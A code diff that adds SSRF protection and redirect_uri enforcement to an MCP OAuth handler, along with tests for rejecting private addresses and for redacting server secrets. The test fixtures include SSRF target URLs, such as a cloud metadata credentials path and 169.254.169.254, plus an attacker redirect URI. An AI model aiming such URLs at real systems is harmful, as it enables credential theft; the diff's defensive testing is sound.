socket.destroy(); + } + sockets.clear(); + httpServer.close(() => resolve()); + }); +} + +describe('MCP OAuth SSRF protection', () => { + let oauthServer: OAuthTestServer; + let ssrfTargetServer: http.Server; + let ssrfTargetPort: number; + let ssrfRequestReceived: boolean; + let destroySSRFSockets: () => Promise; + + beforeEach(async () => { + ssrfRequestReceived = false; + + oauthServer = await createOAuthMCPServer({ + tokenTTLMs: 60000, + issueRefreshTokens: true, + }); + + ssrfTargetPort = await getFreePort(); + ssrfTargetServer = http.createServer((_req, res) => { + ssrfRequestReceived = true; + res.writeHead(200, { 'Content-Type': 'application/json' }); + res.end( + JSON.stringify({ + access_token: 'ssrf-token', + token_type: 'Bearer', + expires_in: 3600, + }), + ); + }); + destroySSRFSockets = trackSockets(ssrfTargetServer); + await new Promise((resolve) => + ssrfTargetServer.listen(ssrfTargetPort, '127.0.0.1', resolve), + ); + }); + + afterEach(async () => { + try { + await oauthServer.close(); + } finally { + await destroySSRFSockets(); + } + }); + + it('should reject token_url pointing to a private IP (refreshOAuthTokens)', async () => { + const code = await oauthServer.getAuthCode(); + const tokenRes = await fetch(`${oauthServer.url}token`, { + method: 'POST', + headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, + body: `grant_type=authorization_code&code=${code}`, + }); + const initial = (await tokenRes.json()) as { + access_token: string; + refresh_token: string; + }; + + const regRes = await fetch(`${oauthServer.url}register`, { + method: 'POST', + headers: { 'Content-Type': 'application/json' }, + body: JSON.stringify({ redirect_uris: ['http://localhost/callback'] }), + }); + const clientInfo = (await regRes.json()) as { + client_id: string; + client_secret: string; + }; + + const ssrfTokenUrl = `http://127.0.0.1:${ssrfTargetPort}/latest/meta-data/iam/security-credentials/`; + + await expect( + MCPOAuthHandler.refreshOAuthTokens( + initial.refresh_token, + { + serverName: 'ssrf-test-server', + serverUrl: oauthServer.url, + clientInfo: { + ...clientInfo, + redirect_uris: ['http://localhost/callback'], + }, + }, + {}, + { + token_url: ssrfTokenUrl, + client_id: clientInfo.client_id, + client_secret: clientInfo.client_secret, + token_exchange_method: TokenExchangeMethodEnum.DefaultPost, + }, + ), + ).rejects.toThrow(/targets a blocked address/); + + expect(ssrfRequestReceived).toBe(false); + }); + + it('should reject private authorization_url in initiateOAuthFlow', async () => { + await expect( + MCPOAuthHandler.initiateOAuthFlow( + 'test-server', + 'https://mcp.example.com/', + 'user-1', + {}, + { + authorization_url: 'http://169.254.169.254/authorize', + token_url: 'https://auth.example.com/token', + client_id: 'client', + client_secret: 'secret', + }, + ), + ).rejects.toThrow(/targets a blocked address/); + }); + + it('should reject private token_url in initiateOAuthFlow', async () => { + await expect( + MCPOAuthHandler.initiateOAuthFlow( + 'test-server', + 'https://mcp.example.com/', + 'user-1', + {}, + { + authorization_url: 'https://auth.example.com/authorize', + token_url: `http://127.0.0.1:${ssrfTargetPort}/token`, + client_id: 'client', + client_secret: 'secret', + }, + ), + ).rejects.toThrow(/targets a blocked address/); + + expect(ssrfRequestReceived).toBe(false); + }); + + it('should reject private revocationEndpoint in revokeOAuthToken', async () => { + await expect( + MCPOAuthHandler.revokeOAuthToken('test-server', 'some-token', 'access', { + serverUrl: 'https://mcp.example.com/', + clientId: 'client', + clientSecret: 'secret', + revocationEndpoint: 'http://10.0.0.1/revoke', + }), + ).rejects.toThrow(/targets a blocked address/); + }); +}); + +describe('MCP OAuth redirect_uri enforcement', () => { + it('should ignore attacker-supplied redirect_uri and use the server default', async () => { + const attackerRedirectUri = 'https://attacker.example.com/steal-code'; + + const result = await MCPOAuthHandler.initiateOAuthFlow( + 'victim-server', + 'https://mcp.example.com/', + 'victim-user-id', + {}, + { + authorization_url: 'https://auth.example.com/authorize', + token_url: 'https://auth.example.com/token', + client_id: 'attacker-client', + client_secret: 'attacker-secret', + redirect_uri: attackerRedirectUri, + }, + ); + + const authUrl = new URL(result.authorizationUrl); + const expectedRedirectUri = `${process.env.DOMAIN_SERVER || 'http://localhost:3080'}/api/mcp/victim-server/oauth/callback`; + expect(authUrl.searchParams.get('redirect_uri')).toBe(expectedRedirectUri); + expect(authUrl.searchParams.get('redirect_uri')).not.toBe(attackerRedirectUri); + }); +}); + +describe('MCP OAuth allowedDomains SSRF exemption for admin-trusted hosts', () => { + it('should allow private authorization_url when hostname is in allowedDomains', async () => { + const result = await MCPOAuthHandler.initiateOAuthFlow( + 'internal-server', + 'https://speedy-mcp.company.com/', + 'user-1', + {}, + { + authorization_url: 'http://10.0.0.1/authorize', + token_url: 'http://10.0.0.1/token', + client_id: 'client', + client_secret: 'secret', + }, + ['10.0.0.1'], + ); + + expect(result.authorizationUrl).toContain('10.0.0.1/authorize'); + }); + + it('should allow private token_url when hostname matches wildcard allowedDomains', async () => { + const result = await MCPOAuthHandler.initiateOAuthFlow( + 'internal-server', + 'https://speedy-mcp.company.com/', + 'user-1', + {}, + { + authorization_url: 'https://auth.company.internal/authorize', + token_url: 'https://auth.company.internal/token', + client_id: 'client', + client_secret: 'secret', + }, + ['*.company.internal'], + ); + + expect(result.authorizationUrl).toContain('auth.company.internal/authorize'); + }); + + it('should still reject private URLs when allowedDomains does not match', async () => { + await expect( + MCPOAuthHandler.initiateOAuthFlow( + 'test-server', + 'https://mcp.example.com/', + 'user-1', + {}, + { + authorization_url: 'http://169.254.169.254/authorize', + token_url: 'https://auth.example.com/token', + client_id: 'client', + client_secret: 'secret', + }, + ['safe.example.com'], + ), + ).rejects.toThrow(/targets a blocked address/); + }); + + it('should still reject when allowedDomains is empty', async () => { + await expect( + MCPOAuthHandler.initiateOAuthFlow( + 'test-server', + 'https://mcp.example.com/', + 'user-1', + {}, + { + authorization_url: 'http://10.0.0.1/authorize', + token_url: 'https://auth.example.com/token', + client_id: 'client', + client_secret: 'secret', + }, + [], + ), + ).rejects.toThrow(/targets a blocked address/); + }); + + it('should allow private revocationEndpoint when hostname is in allowedDomains', async () => { + const mockFetch = jest.fn().mockResolvedValue({ + ok: true, + status: 200, + } as Response); + const originalFetch = global.fetch; + global.fetch = mockFetch; + + try { + await MCPOAuthHandler.revokeOAuthToken( + 'internal-server', + 'some-token', + 'access', + { + serverUrl: 'https://internal.corp.net/', + clientId: 'client', + clientSecret: 'secret', + revocationEndpoint: 'http://10.0.0.1/revoke', + }, + {}, + ['10.0.0.1'], + ); + + expect(mockFetch).toHaveBeenCalled(); + } finally { + global.fetch = originalFetch; + } + }); + + it('should allow localhost token_url in refreshOAuthTokens when localhost is in allowedDomains', async () => { + const mockFetch = jest.fn().mockResolvedValue({ + ok: true, + json: async () => ({ + access_token: 'new-access-token', + token_type: 'Bearer', + expires_in: 3600, + }), + } as Response); + const originalFetch = global.fetch; + global.fetch = mockFetch; + + try { + const tokens = await MCPOAuthHandler.refreshOAuthTokens( + 'old-refresh-token', + { + serverName: 'local-server', + serverUrl: 'http://localhost:8080/', + clientInfo: { + client_id: 'client-id', + client_secret: 'client-secret', + redirect_uris: ['http://localhost:3080/callback'], + }, + }, + {}, + { + token_url: 'http://localhost:8080/token', + client_id: 'client-id', + client_secret: 'client-secret', + }, + ['localhost'], + ); + + expect(tokens.access_token).toBe('new-access-token'); + expect(mockFetch).toHaveBeenCalled(); + } finally { + global.fetch = originalFetch; + } + }); + + describe('auto-discovery path with allowedDomains', () => { + let discoveryServer: OAuthTestServer; + + beforeEach(async () => { + discoveryServer = await createOAuthMCPServer({ + tokenTTLMs: 60000, + issueRefreshTokens: true, + }); + }); + + afterEach(async () => { + await discoveryServer.close(); + }); + + it('should allow auto-discovered OAuth endpoints when server IP is in allowedDomains', async () => { + const result = await MCPOAuthHandler.initiateOAuthFlow( + 'discovery-server', + discoveryServer.url, + 'user-1', + {}, + undefined, + ['127.0.0.1'], + ); + + expect(result.authorizationUrl).toContain('127.0.0.1'); + expect(result.flowId).toBeTruthy(); + }); + + it('should reject auto-discovered endpoints when allowedDomains does not cover server IP', async () => { + await expect( + MCPOAuthHandler.initiateOAuthFlow( + 'discovery-server', + discoveryServer.url, + 'user-1', + {}, + undefined, + ['safe.example.com'], + ), + ).rejects.toThrow(/targets a blocked address/); + }); + + it('should allow auto-discovered token_url in refreshOAuthTokens branch 3 (no clientInfo/config)', async () => { + const code = await discoveryServer.getAuthCode(); + const tokenRes = await fetch(`${discoveryServer.url}token`, { + method: 'POST', + headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, + body: `grant_type=authorization_code&code=${code}`, + }); + const initial = (await tokenRes.json()) as { + access_token: string; + refresh_token: string; + }; + + const tokens = await MCPOAuthHandler.refreshOAuthTokens( + initial.refresh_token, + { + serverName: 'discovery-refresh-server', + serverUrl: discoveryServer.url, + }, + {}, + undefined, + ['127.0.0.1'], + ); + + expect(tokens.access_token).toBeTruthy(); + }); + }); +}); diff --git a/packages/api/src/mcp/__tests__/handler.test.ts b/packages/api/src/mcp/__tests__/handler.test.ts index 3b68d88e9c..31665ce8f7 100644 --- a/packages/api/src/mcp/__tests__/handler.test.ts +++ b/packages/api/src/mcp/__tests__/handler.test.ts @@ -260,10 +260,6 @@ describe('MCPOAuthHandler - Configurable OAuth Metadata', () => { global.fetch = mockFetch; }); - afterEach(() => { - mockFetch.mockClear(); - }); - afterAll(() => { global.fetch = originalFetch; }); @@ -679,6 +675,109 @@ describe('MCPOAuthHandler - Configurable OAuth Metadata', () => { 'Token refresh failed: 400 Bad Request - {"error":"invalid_request","error_description":"refresh_token.client_id: Field required"}', ); }); + + describe('stored token endpoint fallback', () => { + it('uses stored token endpoint when discovery fails (stored clientInfo)', async () => { + const metadata = { + serverName: 'test-server', + serverUrl: 'https://mcp.example.com', + clientInfo: { + client_id: 'test-client-id', + client_secret: 'test-client-secret', + }, + storedTokenEndpoint: 'https://auth.example.com/token', + storedAuthMethods: ['client_secret_basic'], + }; + + mockDiscoverAuthorizationServerMetadata.mockResolvedValueOnce(undefined); + + mockFetch.mockResolvedValueOnce({ + ok: true, + json: async () => ({ + access_token: 'new-access-token', + refresh_token: 'new-refresh-token', + expires_in: 3600, + }), + } as Response); + + const result = await MCPOAuthHandler.refreshOAuthTokens( + 'test-refresh-token', + metadata, + {}, + {}, + ); + + expect(mockFetch).toHaveBeenCalledWith( + 'https://auth.example.com/token', + expect.objectContaining({ method: 'POST' }), + ); + expect(result.access_token).toBe('new-access-token'); + }); + + it('uses stored token endpoint when discovery fails (auto-discovered)', async () => { + const metadata = { + serverName: 'test-server', + serverUrl: 'https://mcp.example.com', + storedTokenEndpoint: 'https://auth.example.com/token', + }; + + mockDiscoverAuthorizationServerMetadata.mockResolvedValueOnce(undefined); + + mockFetch.mockResolvedValueOnce({ + ok: true, + json: async () => ({ + access_token: 'new-access-token', + expires_in: 3600, + }), + } as Response); + + const result = await MCPOAuthHandler.refreshOAuthTokens( + 'test-refresh-token', + metadata, + {}, + {}, + ); + + const [fetchUrl] = mockFetch.mock.calls[0]; + expect(fetchUrl).toBeInstanceOf(URL); + expect(fetchUrl.toString()).toBe('https://auth.example.com/token'); + expect(result.access_token).toBe('new-access-token'); + }); + + it('still throws when discovery fails and no stored endpoint (stored clientInfo)', async () => { + const metadata = { + serverName: 'test-server', + serverUrl: 'https://mcp.example.com', + clientInfo: { + client_id: 'test-client-id', + client_secret: 'test-client-secret', + }, + }; + + mockDiscoverAuthorizationServerMetadata.mockResolvedValueOnce(undefined); + + await expect( + MCPOAuthHandler.refreshOAuthTokens('test-refresh-token', metadata, {}, {}), + ).rejects.toThrow('No OAuth metadata discovered for token refresh'); + + expect(mockFetch).not.toHaveBeenCalled(); + }); + + it('still throws when discovery fails and no stored endpoint (auto-discovered)', async () => { + const metadata = { + serverName: 'test-server', + serverUrl: 'https://mcp.example.com', + }; + + mockDiscoverAuthorizationServerMetadata.mockResolvedValueOnce(undefined); + + await expect( + MCPOAuthHandler.refreshOAuthTokens('test-refresh-token', metadata, {}, {}), + ).rejects.toThrow('No OAuth metadata discovered for token refresh'); + + expect(mockFetch).not.toHaveBeenCalled(); + }); + }); }); describe('revokeOAuthToken', () => { @@ -1187,10 +1286,6 @@ describe('MCPOAuthHandler - Configurable OAuth Metadata', () => { global.fetch = mockFetch; }); - afterEach(() => { - mockFetch.mockClear(); - }); - afterAll(() => { global.fetch = originalFetch; }); @@ -1363,7 +1458,7 @@ describe('MCPOAuthHandler - Configurable OAuth Metadata', () => { ); }); - it('should use fallback /token endpoint for refresh when metadata discovery fails', async () => { + it('should throw when metadata discovery fails during refresh (stored clientInfo)', async () => { const metadata = { serverName: 'test-server', serverUrl: 'https://mcp.example.com', @@ -1373,38 +1468,16 @@ describe('MCPOAuthHandler - Configurable OAuth Metadata', () => { }, }; - // Mock metadata discovery to return undefined (no .well-known) mockDiscoverAuthorizationServerMetadata.mockResolvedValueOnce(undefined); - // Mock successful token refresh - mockFetch.mockResolvedValueOnce({ - ok: true, - json: async () => ({ - access_token: 'new-access-token', - refresh_token: 'new-refresh-token', - expires_in: 3600, - }), - } as Response); + await expect( + MCPOAuthHandler.refreshOAuthTokens('test-refresh-token', metadata, {}, {}), + ).rejects.toThrow('No OAuth metadata discovered for token refresh'); - const result = await MCPOAuthHandler.refreshOAuthTokens( - 'test-refresh-token', - metadata, - {}, - {}, - ); - - // Verify fetch was called with fallback /token endpoint - expect(mockFetch).toHaveBeenCalledWith( - 'https://mcp.example.com/token', - expect.objectContaining({ - method: 'POST', - }), - ); - - expect(result.access_token).toBe('new-access-token'); + expect(mockFetch).not.toHaveBeenCalled(); }); - it('should use fallback auth methods when metadata discovery fails during refresh', async () => { + it('should throw when metadata lacks token endpoint during refresh', async () => { const metadata = { serverName: 'test-server', serverUrl: 'https://mcp.example.com', @@ -1414,30 +1487,51 @@ describe('MCPOAuthHandler - Configurable OAuth Metadata', () => { }, }; - // Mock metadata discovery to return undefined + mockDiscoverAuthorizationServerMetadata.mockResolvedValueOnce({ + issuer: 'https://auth.example.com/', + authorization_endpoint: 'https://auth.example.com/authorize', + response_types_supported: ['code'], + } as AuthorizationServerMetadata); + + await expect( + MCPOAuthHandler.refreshOAuthTokens('test-refresh-token', metadata, {}, {}), + ).rejects.toThrow('No token endpoint found in OAuth metadata'); + + expect(mockFetch).not.toHaveBeenCalled(); + }); + + it('should throw for auto-discovered refresh when metadata discovery returns undefined', async () => { + const metadata = { + serverName: 'test-server', + serverUrl: 'https://mcp.example.com', + }; + mockDiscoverAuthorizationServerMetadata.mockResolvedValueOnce(undefined); - // Mock successful token refresh - mockFetch.mockResolvedValueOnce({ - ok: true, - json: async () => ({ - access_token: 'new-access-token', - expires_in: 3600, - }), - } as Response); + await expect( + MCPOAuthHandler.refreshOAuthTokens('test-refresh-token', metadata, {}, {}), + ).rejects.toThrow('No OAuth metadata discovered for token refresh'); - await MCPOAuthHandler.refreshOAuthTokens('test-refresh-token', metadata, {}, {}); + expect(mockFetch).not.toHaveBeenCalled(); + }); - // Verify it uses client_secret_basic (first in fallback auth methods) - const expectedAuth = `Basic ${Buffer.from('test-client-id:test-client-secret').toString('base64')}`; - expect(mockFetch).toHaveBeenCalledWith( - expect.any(String), - expect.objectContaining({ - headers: expect.objectContaining({ - Authorization: expectedAuth, - }), - }), - ); + it('should throw for auto-discovered refresh when metadata has no token_endpoint', async () => { + const metadata = { + serverName: 'test-server', + serverUrl: 'https://mcp.example.com', + }; + + mockDiscoverAuthorizationServerMetadata.mockResolvedValueOnce({ + issuer: 'https://auth.example.com/', + authorization_endpoint: 'https://auth.example.com/authorize', + response_types_supported: ['code'], + } as AuthorizationServerMetadata); + + await expect( + MCPOAuthHandler.refreshOAuthTokens('test-refresh-token', metadata, {}, {}), + ).rejects.toThrow('No token endpoint found in OAuth metadata'); + + expect(mockFetch).not.toHaveBeenCalled(); }); describe('path-based URL origin fallback', () => { @@ -1574,7 +1668,7 @@ describe('MCPOAuthHandler - Configurable OAuth Metadata', () => { expect(result.access_token).toBe('new-access-token'); }); - it('falls back to /token when both path and origin discovery fail', async () => { + it('throws when both path and origin discovery return undefined', async () => { const metadata = { serverName: 'sentry', serverUrl: 'https://mcp.sentry.dev/mcp', @@ -1585,36 +1679,19 @@ describe('MCPOAuthHandler - Configurable OAuth Metadata', () => { }, }; - // Both path AND origin discovery return undefined mockDiscoverAuthorizationServerMetadata .mockResolvedValueOnce(undefined) .mockResolvedValueOnce(undefined); - mockFetch.mockResolvedValueOnce({ - ok: true, - json: async () => ({ - access_token: 'new-access-token', - refresh_token: 'new-refresh-token', - expires_in: 3600, - }), - } as Response); - - const result = await MCPOAuthHandler.refreshOAuthTokens( - 'test-refresh-token', - metadata, - {}, - {}, - ); + await expect( + MCPOAuthHandler.refreshOAuthTokens('test-refresh-token', metadata, {}, {}), + ).rejects.toThrow('No OAuth metadata discovered for token refresh'); expect(mockDiscoverAuthorizationServerMetadata).toHaveBeenCalledTimes(2); - - // Falls back to /token relative to server URL origin - const [fetchUrl] = mockFetch.mock.calls[0]; - expect(String(fetchUrl)).toBe('https://mcp.sentry.dev/token'); - expect(result.access_token).toBe('new-access-token'); + expect(mockFetch).not.toHaveBeenCalled(); }); - it('does not retry with origin when server URL has no path (root URL)', async () => { + it('throws when root URL discovery returns undefined (no path retry)', async () => { const metadata = { serverName: 'test-server', serverUrl: 'https://auth.example.com/', @@ -1624,18 +1701,14 @@ describe('MCPOAuthHandler - Configurable OAuth Metadata', () => { }, }; - // Root URL discovery fails — no retry mockDiscoverAuthorizationServerMetadata.mockResolvedValueOnce(undefined); - mockFetch.mockResolvedValueOnce({ - ok: true, - json: async () => ({ access_token: 'new-token', expires_in: 3600 }), - } as Response); + await expect( + MCPOAuthHandler.refreshOAuthTokens('test-refresh-token', metadata, {}, {}), + ).rejects.toThrow('No OAuth metadata discovered for token refresh'); - await MCPOAuthHandler.refreshOAuthTokens('test-refresh-token', metadata, {}, {}); - - // Only one discovery attempt for a root URL expect(mockDiscoverAuthorizationServerMetadata).toHaveBeenCalledTimes(1); + expect(mockFetch).not.toHaveBeenCalled(); }); it('retries with origin when path-based discovery throws', async () => { diff --git a/packages/api/src/mcp/__tests__/utils.test.ts b/packages/api/src/mcp/__tests__/utils.test.ts index 716a230ebe..e4fb31bdad 100644 --- a/packages/api/src/mcp/__tests__/utils.test.ts +++ b/packages/api/src/mcp/__tests__/utils.test.ts @@ -1,4 +1,5 @@ -import { normalizeServerName } from '../utils'; +import { normalizeServerName, redactServerSecrets, redactAllServerSecrets } from '~/mcp/utils'; +import type { ParsedServerConfig } from '~/mcp/types'; describe('normalizeServerName', () => { it('should not modify server names that already match the pattern', () => { @@ -26,3 +27,201 @@ describe('normalizeServerName', () => { expect(result).toMatch(/^[a-zA-Z0-9_.-]+$/); }); }); + +describe('redactServerSecrets', () => { + it('should strip apiKey.key from admin-sourced keys', () => { + const config: ParsedServerConfig = { + type: 'sse', + url: 'https://example.com/mcp', + apiKey: { + source: 'admin', + authorization_type: 'bearer', + key: 'super-secret-api-key', + }, + }; + const redacted = redactServerSecrets(config); + expect(redacted.apiKey?.key).toBeUndefined(); + expect(redacted.apiKey?.source).toBe('admin'); + expect(redacted.apiKey?.authorization_type).toBe('bearer'); + }); + + it('should strip oauth.client_secret', () => { + const config: ParsedServerConfig = { + type: 'sse', + url: 'https://example.com/mcp', + oauth: { + client_id: 'my-client', + client_secret: 'super-secret-oauth', + scope: 'read', + }, + }; + const redacted = redactServerSecrets(config); + expect(redacted.oauth?.client_secret).toBeUndefined(); + expect(redacted.oauth?.client_id).toBe('my-client'); + expect(redacted.oauth?.scope).toBe('read'); + }); + + it('should strip both apiKey.key and oauth.client_secret simultaneously', () => { + const config: ParsedServerConfig = { + type: 'sse', + url: 'https://example.com/mcp', + apiKey: { + source: 'admin', + authorization_type: 'custom', + custom_header: 'X-API-Key', + key: 'secret-key', + }, + oauth: { + client_id: 'cid', + client_secret: 'csecret', + }, + }; + const redacted = redactServerSecrets(config); + expect(redacted.apiKey?.key).toBeUndefined(); + expect(redacted.apiKey?.custom_header).toBe('X-API-Key'); + expect(redacted.oauth?.client_secret).toBeUndefined(); + expect(redacted.oauth?.client_id).toBe('cid'); + }); + + it('should exclude headers from SSE configs', () => { + const config: ParsedServerConfig = { + type: 'sse', + url: 'https://example.com/mcp', + title: 'SSE Server', + }; + (config as ParsedServerConfig & { headers: Record }).headers = { + Authorization: 'Bearer admin-token-123', + 'X-Custom': 'safe-value', + }; + const redacted = redactServerSecrets(config); + expect((redacted as Record).headers).toBeUndefined(); + expect(redacted.title).toBe('SSE Server'); + }); + + it('should exclude env from stdio configs', () => { + const config: ParsedServerConfig = { + type: 'stdio', + command: 'node', + args: ['server.js'], + env: { DATABASE_URL: 'postgres://admin:password@localhost/db', PATH: '/usr/bin' }, + }; + const redacted = redactServerSecrets(config); + expect((redacted as Record).env).toBeUndefined(); + expect((redacted as Record).command).toBeUndefined(); + expect((redacted as Record).args).toBeUndefined(); + }); + + it('should exclude oauth_headers', () => { + const config: ParsedServerConfig = { + type: 'sse', + url: 'https://example.com/mcp', + oauth_headers: { Authorization: 'Bearer oauth-admin-token' }, + }; + const redacted = redactServerSecrets(config); + expect((redacted as Record).oauth_headers).toBeUndefined(); + }); + + it('should strip apiKey.key even for user-sourced keys', () => { + const config: ParsedServerConfig = { + type: 'sse', + url: 'https://example.com/mcp', + apiKey: { source: 'user', authorization_type: 'bearer', key: 'my-own-key' }, + }; + const redacted = redactServerSecrets(config); + expect(redacted.apiKey?.key).toBeUndefined(); + expect(redacted.apiKey?.source).toBe('user'); + }); + + it('should not mutate the original config', () => { + const config: ParsedServerConfig = { + type: 'sse', + url: 'https://example.com/mcp', + apiKey: { source: 'admin', authorization_type: 'bearer', key: 'secret' }, + oauth: { client_id: 'cid', client_secret: 'csecret' }, + }; + redactServerSecrets(config); + expect(config.apiKey?.key).toBe('secret'); + expect(config.oauth?.client_secret).toBe('csecret'); + }); + + it('should preserve all safe metadata fields', () => { + const config: ParsedServerConfig = { + type: 'sse', + url: 'https://example.com/mcp', + title: 'My Server', + description: 'A test server', + iconPath: '/icons/test.png', + chatMenu: true, + requiresOAuth: false, + capabilities: '{"tools":{}}', + tools: 'tool_a, tool_b', + dbId: 'abc123', + updatedAt: 1700000000000, + consumeOnly: false, + inspectionFailed: false, + customUserVars: { API_KEY: { title: 'API Key', description: 'Your key' } }, + }; + const redacted = redactServerSecrets(config); + expect(redacted.title).toBe('My Server'); + expect(redacted.description).toBe('A test server'); + expect(redacted.iconPath).toBe('/icons/test.png'); + expect(redacted.chatMenu).toBe(true); + expect(redacted.requiresOAuth).toBe(false); + expect(redacted.capabilities).toBe('{"tools":{}}'); + expect(redacted.tools).toBe('tool_a, tool_b'); + expect(redacted.dbId).toBe('abc123'); + expect(redacted.updatedAt).toBe(1700000000000); + expect(redacted.consumeOnly).toBe(false); + expect(redacted.inspectionFailed).toBe(false); + expect(redacted.customUserVars).toEqual(config.customUserVars); + }); + + it('should pass URLs through unchanged', () => { + const config: ParsedServerConfig = { + type: 'sse', + url: 'https://mcp.example.com/sse?param=value', + }; + const redacted = redactServerSecrets(config); + expect(redacted.url).toBe('https://mcp.example.com/sse?param=value'); + }); + + it('should only include explicitly allowlisted fields', () => { + const config: ParsedServerConfig = { + type: 'sse', + url: 'https://example.com/mcp', + title: 'Test', + }; + (config as Record).someNewSensitiveField = 'leaked-value'; + const redacted = redactServerSecrets(config); + expect((redacted as Record).someNewSensitiveField).toBeUndefined(); + expect(redacted.title).toBe('Test'); + }); +}); + +describe('redactAllServerSecrets', () => { + it('should redact secrets from all configs in the map', () => { + const configs: Record = { + 'server-a': { + type: 'sse', + url: 'https://a.com/mcp', + apiKey: { source: 'admin', authorization_type: 'bearer', key: 'key-a' }, + }, + 'server-b': { + type: 'sse', + url: 'https://b.com/mcp', + oauth: { client_id: 'cid-b', client_secret: 'secret-b' }, + }, + 'server-c': { + type: 'stdio', + command: 'node', + args: ['c.js'], + }, + }; + const redacted = redactAllServerSecrets(configs); + expect(redacted['server-a'].apiKey?.key).toBeUndefined(); + expect(redacted['server-a'].apiKey?.source).toBe('admin'); + expect(redacted['server-b'].oauth?.client_secret).toBeUndefined(); + expect(redacted['server-b'].oauth?.client_id).toBe('cid-b'); + expect((redacted['server-c'] as Record).command).toBeUndefined(); + }); +}); diff --git a/packages/api/src/mcp/oauth/handler.ts b/packages/api/src/mcp/oauth/handler.ts index 366d0d2fde..873af5c66d 100644 --- a/packages/api/src/mcp/oauth/handler.ts +++ b/packages/api/src/mcp/oauth/handler.ts @@ -24,6 +24,7 @@ import { selectRegistrationAuthMethod, inferClientAuthMethod, } from './methods'; +import { isSSRFTarget, resolveHostnameSSRF, isOAuthUrlAllowed } from '~/auth'; import { sanitizeUrlForLogging } from '~/mcp/utils'; /** Type for the OAuth metadata from the SDK */ @@ -122,6 +123,7 @@ export class MCPOAuthHandler { private static async discoverMetadata( serverUrl: string, oauthHeaders: Record, + allowedDomains?: string[] | null, ): Promise<{ metadata: OAuthMetadata; resourceMetadata?: OAuthProtectedResourceMetadata; @@ -144,7 +146,9 @@ export class MCPOAuthHandler { resourceMetadata = await discoverOAuthProtectedResourceMetadata(serverUrl, {}, fetchFn); if (resourceMetadata?.authorization_servers?.length) { - authServerUrl = new URL(resourceMetadata.authorization_servers[0]); + const discoveredAuthServer = resourceMetadata.authorization_servers[0]; + await this.validateOAuthUrl(discoveredAuthServer, 'authorization_server', allowedDomains); + authServerUrl = new URL(discoveredAuthServer); logger.debug( `[MCPOAuth] Found authorization server from resource metadata: ${authServerUrl}`, ); @@ -200,6 +204,25 @@ export class MCPOAuthHandler { logger.debug(`[MCPOAuth] OAuth metadata discovered successfully`); const metadata = await OAuthMetadataSchema.parseAsync(rawMetadata); + const endpointChecks: Promise[] = []; + if (metadata.registration_endpoint) { + endpointChecks.push( + this.validateOAuthUrl( + metadata.registration_endpoint, + 'registration_endpoint', + allowedDomains, + ), + ); + } + if (metadata.token_endpoint) { + endpointChecks.push( + this.validateOAuthUrl(metadata.token_endpoint, 'token_endpoint', allowedDomains), + ); + } + if (endpointChecks.length > 0) { + await Promise.all(endpointChecks); + } + logger.debug(`[MCPOAuth] OAuth metadata parsed successfully`); return { metadata: metadata as unknown as OAuthMetadata, @@ -344,6 +367,7 @@ export class MCPOAuthHandler { userId: string, oauthHeaders: Record, config?: MCPOptions['oauth'], + allowedDomains?: string[] | null, ): Promise<{ authorizationUrl: string; flowId: string; flowMetadata: MCPOAuthFlowMetadata }> { logger.debug( `[MCPOAuth] initiateOAuthFlow called for ${serverName} with URL: ${sanitizeUrlForLogging(serverUrl)}`, @@ -355,10 +379,14 @@ export class MCPOAuthHandler { logger.debug(`[MCPOAuth] Generated flowId: ${flowId}, state: ${state}`); try { - // Check if we have pre-configured OAuth settings if (config?.authorization_url && config?.token_url && config?.client_id) { logger.debug(`[MCPOAuth] Using pre-configured OAuth settings for ${serverName}`); + await Promise.all([ + this.validateOAuthUrl(config.authorization_url, 'authorization_url', allowedDomains), + this.validateOAuthUrl(config.token_url, 'token_url', allowedDomains), + ]); + const skipCodeChallengeCheck = config?.skip_code_challenge_check === true || process.env.MCP_SKIP_CODE_CHALLENGE_CHECK === 'true'; @@ -410,10 +438,11 @@ export class MCPOAuthHandler { code_challenge_methods_supported: codeChallengeMethodsSupported, }; logger.debug(`[MCPOAuth] metadata for "${serverName}": ${JSON.stringify(metadata)}`); + const redirectUri = this.getDefaultRedirectUri(serverName); const clientInfo: OAuthClientInformation = { client_id: config.client_id, client_secret: config.client_secret, - redirect_uris: [config.redirect_uri || this.getDefaultRedirectUri(serverName)], + redirect_uris: [redirectUri], scope: config.scope, token_endpoint_auth_method: tokenEndpointAuthMethod, }; @@ -422,7 +451,7 @@ export class MCPOAuthHandler { const { authorizationUrl, codeVerifier } = await startAuthorization(serverUrl, { metadata: metadata as unknown as SDKOAuthMetadata, clientInformation: clientInfo, - redirectUrl: clientInfo.redirect_uris?.[0] || this.getDefaultRedirectUri(serverName), + redirectUrl: redirectUri, scope: config.scope, }); @@ -456,14 +485,14 @@ export class MCPOAuthHandler { const { metadata, resourceMetadata, authServerUrl } = await this.discoverMetadata( serverUrl, oauthHeaders, + allowedDomains, ); logger.debug( `[MCPOAuth] OAuth metadata discovered, auth server URL: ${sanitizeUrlForLogging(authServerUrl)}`, ); - /** Dynamic client registration based on the discovered metadata */ - const redirectUri = config?.redirect_uri || this.getDefaultRedirectUri(serverName); + const redirectUri = this.getDefaultRedirectUri(serverName); logger.debug(`[MCPOAuth] Registering OAuth client with redirect URI: ${redirectUri}`); const clientInfo = await this.registerOAuthClient( @@ -568,7 +597,11 @@ export class MCPOAuthHandler { } /** - * Completes the OAuth flow by exchanging the authorization code for tokens + * Completes the OAuth flow by exchanging the authorization code for tokens. + * + * `allowedDomains` is intentionally absent: all URLs used here (serverUrl, + * token_endpoint) originate from {@link MCPOAuthFlowMetadata} that was + * SSRF-validated during {@link initiateOAuthFlow}. No new URL resolution occurs. */ static async completeOAuthFlow( flowId: string, @@ -672,6 +705,36 @@ export class MCPOAuthHandler { return randomBytes(32).toString('base64url'); } + /** + * Validates an OAuth URL is not targeting a private/internal address. + * Skipped when the full URL (hostname + protocol + port) matches an admin-trusted + * allowedDomains entry, honoring protocol/port constraints when the admin specifies them. + */ + private static async validateOAuthUrl( + url: string, + fieldName: string, + allowedDomains?: string[] | null, + ): Promise { + if (isOAuthUrlAllowed(url, allowedDomains)) { + return; + } + + let hostname: string; + try { + hostname = new URL(url).hostname; + } catch { + throw new Error(`Invalid OAuth ${fieldName}: ${sanitizeUrlForLogging(url)}`); + } + + if (isSSRFTarget(hostname)) { + throw new Error(`OAuth ${fieldName} targets a blocked address`); + } + + if (await resolveHostnameSSRF(hostname)) { + throw new Error(`OAuth ${fieldName} resolves to a private IP address`); + } + } + private static readonly STATE_MAP_TYPE = 